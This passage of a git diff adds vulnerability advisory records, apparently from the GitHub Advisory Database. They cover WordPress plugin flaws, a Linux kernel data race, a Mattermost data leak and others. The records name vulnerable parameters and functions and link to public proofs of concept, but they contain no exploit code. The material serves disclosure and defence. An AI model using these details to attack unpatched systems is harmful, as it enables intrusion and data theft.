"github_reviewed_at": null, + "nvd_published_at": "2026-02-19T07:17:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json new file mode 100644 index 0000000000000..4bcf8b83f90d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-phqg-p332-q7vc/GHSA-phqg-p332-q7vc.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-phqg-p332-q7vc", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23212" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: annotate data-races around slave->last_rx\n\nslave->last_rx and slave->target_last_arp_rx[...] can be read and written\nlocklessly. Add READ_ONCE() and WRITE_ONCE() annotations.\n\nsyzbot reported:\n\nBUG: KCSAN: data-race in bond_rcv_validate / bond_rcv_validate\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 1:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n...\n\nwrite to 0xffff888149f0d428 of 8 bytes by interrupt on cpu 0:\n bond_rcv_validate+0x202/0x7a0 drivers/net/bonding/bond_main.c:3335\n bond_handle_frame+0xde/0x5e0 drivers/net/bonding/bond_main.c:1533\n __netif_receive_skb_core+0x5b1/0x1950 net/core/dev.c:6039\n __netif_receive_skb_one_core net/core/dev.c:6150 [inline]\n __netif_receive_skb+0x59/0x270 net/core/dev.c:6265\n netif_receive_skb_internal net/core/dev.c:6351 [inline]\n netif_receive_skb+0x4b/0x2d0 net/core/dev.c:6410\n br_netif_receive_skb net/bridge/br_input.c:30 [inline]\n NF_HOOK include/linux/netfilter.h:318 [inline]\n...\n\nvalue changed: 0x0000000100005365 -> 0x0000000100005366", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23212" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8c0be3277e7aefb2f900fc37ca3fe7df362e26f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/a7516cb0165926d308187e231ccd330e5e3ebff7" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/b956289b83887e0a306067b6003c3fcd81bfdf84" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/bd98324e327e41de04b13e372cc16f73150df254" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f6c3665b6dc53c3ab7d31b585446a953a74340ef" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json new file mode 100644 index 0000000000000..6a94e565ad909 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj33-46c7-rm7p/GHSA-pj33-46c7-rm7p.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj33-46c7-rm7p", + "modified": "2026-02-18T06:30:19Z", + "published": "2026-02-18T06:30:19Z", + "aliases": [ + "CVE-2026-2023" + ], + "details": "The WP Plugin Info Card plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 6.2.0. This is due to missing nonce validation in the ajax_save_custom_plugin() function, which is disabled by prefixing the check with 'false &&'. This makes it possible for unauthenticated attackers to create or modify custom plugin entries via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2023" + }, + { + "type": "WEB", + "url": "https://github.com/DLXPlugins/wp-plugin-info-card/blob/0fe50d3ccb3d61d5d176fab9e9f280ac8bfd8614/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/tags/6.2.0/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/wp-plugin-info-card/trunk/php/Admin/Init.php#L390" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3454992%40wp-plugin-info-card&new=3454992%40wp-plugin-info-card&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/1213a21f-a9c1-4da3-99b5-4a5a0673073f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T06:16:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json new file mode 100644 index 0000000000000..90471ced8be2b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pj5w-7j3v-9wwv/GHSA-pj5w-7j3v-9wwv.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pj5w-7j3v-9wwv", + "modified": "2026-02-20T18:31:35Z", + "published": "2026-02-20T18:31:35Z", + "aliases": [ + "CVE-2025-68854" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in harman79 ID Arrays id-arrays allows DOM-Based XSS.This issue affects ID Arrays: from n/a through <= 2.1.2.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68854" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/id-arrays/vulnerability/wordpress-id-arrays-plugin-2-1-2-post-based-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json new file mode 100644 index 0000000000000..cb1f59587984f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pjx3-8fqj-x6hr/GHSA-pjx3-8fqj-x6hr.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pjx3-8fqj-x6hr", + "modified": "2026-02-20T18:31:34Z", + "published": "2026-02-20T18:31:34Z", + "aliases": [ + "CVE-2025-67972" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Prague prague-plugins allows Reflected XSS.This issue affects Prague: from n/a through <= 2.2.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67972" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/prague-plugins/vulnerability/wordpress-prague-plugin-2-2-8-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json b/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json new file mode 100644 index 0000000000000..6c96badd3d93d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm2j-978g-6g85/GHSA-pm2j-978g-6g85.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm2j-978g-6g85", + "modified": "2026-02-20T18:31:39Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-26096" + ], + "details": "Incorrect Permission Assignment for Critical Resource in Owl opds 2.2.0.4 allows File Manipulation via a crafted network request.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26096" + }, + { + "type": "WEB", + "url": "https://www.nozominetworks.com/labs/vulnerability-advisories-cve-2026-26096" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T17:25:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json b/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json new file mode 100644 index 0000000000000..b268fc9cad612 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm69-54qr-cgv7/GHSA-pm69-54qr-cgv7.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm69-54qr-cgv7", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2026-22346" + ], + "details": "Deserialization of Untrusted Data vulnerability in A WP Life Slider Responsive Slideshow – Image slider, Gallery slideshow slider-responsive-slideshow allows Object Injection.This issue affects Slider Responsive Slideshow – Image slider, Gallery slideshow: from n/a through <= 1.5.4.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22346" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/slider-responsive-slideshow/vulnerability/wordpress-slider-responsive-slideshow-image-slider-gallery-slideshow-plugin-1-5-4-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json new file mode 100644 index 0000000000000..fac368002aa55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm8v-w3f2-2hxx", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2026-2126" + ], + "details": "The User Submitted Posts – Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 20260113. This is due to the `usp_get_submitted_category()` function accepting user-submitted category IDs from the POST body without validating them against the admin-configured allowed categories stored in `usp_options['categories']`. This makes it possible for unauthenticated attackers to assign submitted posts to arbitrary categories, including restricted ones, by crafting a direct POST request with manipulated `user-submitted-category[]` values, bypassing the frontend category restrictions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L1431" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L298" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3463696%40user-submitted-posts%2Ftrunk&old=3456521%40user-submitted-posts%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json b/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json new file mode 100644 index 0000000000000..49934160ef248 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmfh-36xp-5j94/GHSA-pmfh-36xp-5j94.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmfh-36xp-5j94", + "modified": "2026-02-20T00:31:52Z", + "published": "2026-02-19T18:31:52Z", + "aliases": [ + "CVE-2026-25314" + ], + "details": "Missing Authorization vulnerability in WP Messiah TOP Table Of Contents top-table-of-contents allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects TOP Table Of Contents: from n/a through <= 1.3.31.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25314" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/top-table-of-contents/vulnerability/wordpress-top-table-of-contents-plugin-1-3-31-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json new file mode 100644 index 0000000000000..600283669463d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pmgj-wpmq-6xx5/GHSA-pmgj-wpmq-6xx5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pmgj-wpmq-6xx5", + "modified": "2026-02-20T21:31:23Z", + "published": "2026-02-20T18:31:39Z", + "aliases": [ + "CVE-2026-24955" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in fox-themes Whizz Plugins whizz-plugins allows Reflected XSS.This issue affects Whizz Plugins: from n/a through <= 1.9.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24955" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/whizz-plugins/vulnerability/wordpress-whizz-plugins-plugin-1-9-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json new file mode 100644 index 0000000000000..d54576b1272d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp46-7w92-4xvf", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2912" + ], + "details": "A vulnerability was found in code-projects Online Reviewer System 1.0. Impacted is an unknown function of the file /system/system/students/assessments/results/studentresult-view.php. The manipulation of the argument test_id results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2912" + }, + { + "type": "WEB", + "url": "https://github.com/tiancesec/CVE/issues/25" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347221" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347221" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755219" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json b/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json new file mode 100644 index 0000000000000..2a1ec8942870d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp6p-hwf9-pcpx/GHSA-pp6p-hwf9-pcpx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp6p-hwf9-pcpx", + "modified": "2026-02-18T00:30:16Z", + "published": "2026-02-18T00:30:16Z", + "aliases": [ + "CVE-2026-2627" + ], + "details": "A security flaw has been discovered in Softland FBackup up to 9.9. This impacts an unknown function in the library C:\\Program Files\\Common Files\\microsoft shared\\ink\\HID.dll of the component Backup/Restore. The manipulation results in link following. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2627" + }, + { + "type": "WEB", + "url": "https://github.com/thezdi/PoC/tree/main/FilesystemEoPs" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752050" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-59" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-17T22:18:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp8p-hrmg-pjhx/GHSA-pp8p-hrmg-pjhx.json b/advisories/unreviewed/2026/02/GHSA-pp8p-hrmg-pjhx/GHSA-pp8p-hrmg-pjhx.json new file mode 100644 index 0000000000000..eb3c5863e1b5e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp8p-hrmg-pjhx/GHSA-pp8p-hrmg-pjhx.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp8p-hrmg-pjhx", + "modified": "2026-02-19T21:30:46Z", + "published": "2026-02-19T18:31:53Z", + "aliases": [ + "CVE-2026-25416" + ], + "details": "Missing Authorization vulnerability in blazethemes News Kit Elementor Addons news-kit-elementor-addons allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects News Kit Elementor Addons: from n/a through <= 1.4.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25416" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/news-kit-elementor-addons/vulnerability/wordpress-news-kit-elementor-addons-plugin-1-4-2-broken-access-control-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-19T09:16:23Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp9j-pf5c-659x/GHSA-pp9j-pf5c-659x.json b/advisories/unreviewed/2026/02/GHSA-pp9j-pf5c-659x/GHSA-pp9j-pf5c-659x.json deleted file mode 100644 index 8d33e84422e01..0000000000000 --- a/advisories/unreviewed/2026/02/GHSA-pp9j-pf5c-659x/GHSA-pp9j-pf5c-659x.json +++ /dev/null @@ -1,36 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-pp9j-pf5c-659x", - "modified": "2026-02-16T12:30:25Z", - "published": "2026-02-16T12:30:25Z", - "aliases": [ - "CVE-2025-13821" - ], - "details": "Mattermost versions 11.1.x <= 11.1.2, 10.11.x <= 10.11.9, 11.2.x <= 11.2.1 fail to sanitize sensitive data in WebSocket messages which allows authenticated users to exfiltrate password hashes and MFA secrets via profile nickname updates or email verification events. Mattermost Advisory ID: MMSA-2025-00560", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" - } - ], - "affected": [], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13821" - }, - { - "type": "WEB", - "url": "https://mattermost.com/security-updates" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-200" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2026-02-16T12:16:21Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json new file mode 100644 index 0000000000000..5dbb96038594a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pppv-pc54-6j8r", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-2661" + ], + "details": "A security flaw has been discovered in Squirrel up to 3.2. This affects the function SQObjectPtr::operator in the library squirrel/sqobject.h. The manipulation results in heap-based buffer overflow. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2661" + }, + { + "type": "WEB", + "url": "https://github.com/albertodemichelis/squirrel/issues/310" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i310/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json new file mode 100644 index 0000000000000..e7cfd796fb0c4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pq2q-m7vr-7342/GHSA-pq2q-m7vr-7342.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pq2q-m7vr-7342", + "modified": "2026-02-20T18:31:37Z", + "published": "2026-02-20T18:31:37Z", + "aliases": [ + "CVE-2025-69391" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GT3themes Diamond diamond allows Reflected XSS.This issue affects Diamond: from n/a through <= 2.4.8.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69391" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/diamond/vulnerability/wordpress-diamond-theme-2-4-8-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json b/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json new file mode 100644 index 0000000000000..bb633a6907ac6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pq9c-2qch-jgmw/GHSA-pq9c-2qch-jgmw.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pq9c-2qch-jgmw", + "modified": "2026-02-20T18:31:38Z", + "published": "2026-02-20T18:31:38Z", + "aliases": [ + "CVE-2025-69405" + ], + "details": "Deserialization of Untrusted Data vulnerability in ThemeREX Lorem Ipsum | Books & Media Store lorem-ipsum-books-media-store allows Object Injection.This issue affects Lorem Ipsum | Books & Media Store: from n/a through <= 1.2.6.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69405" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Theme/lorem-ipsum-books-media-store/vulnerability/wordpress-lorem-ipsum-books-media-store-theme-1-2-6-php-object-injection-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-20T16:22:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json new file mode 100644 index 0000000000000..6474968ed61b9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pqh8-xq2x-mwg2/GHSA-pqh8-xq2x-mwg2.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pqh8-xq2x-mwg2", + "modified": "2026-02-20T15:31:00Z", + "published": "2026-02-17T21:31:14Z", + "aliases": [ + "CVE-2026-26732" + ], + "details": "TOTOLINK A3002RU V2.1.1-B20211108.1455 was discovered to contain a stack-based buffer 